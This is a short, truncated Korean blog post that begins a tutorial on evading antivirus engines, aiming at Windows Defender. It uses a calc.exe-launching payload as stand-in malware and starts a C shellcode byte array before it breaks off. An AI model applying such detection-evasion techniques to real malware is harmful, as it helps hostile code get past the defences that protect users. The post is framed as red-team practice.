
AV 엔진 우회 실습 1
·
System/침투
참고: https://cocomelonc.github.io/ AV 엔진 우회 실습 1 [튜토리얼] payload: calc.exe 프로세스를 실행하는 코드. (멀웨어라고 가정) 목적 1. 코드 실행 2. 악성 프로그램을 탐지하는 안티바이러스 엔진의 수를 확인 3. 해당 엔진의 수를 줄이려고 시도할 것. ▶ 본인은 Windows Defender를 우회하려는 목적으로 시도해볼 것이다. #include #include #include #include unsigned char my_payload[] = { 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0x..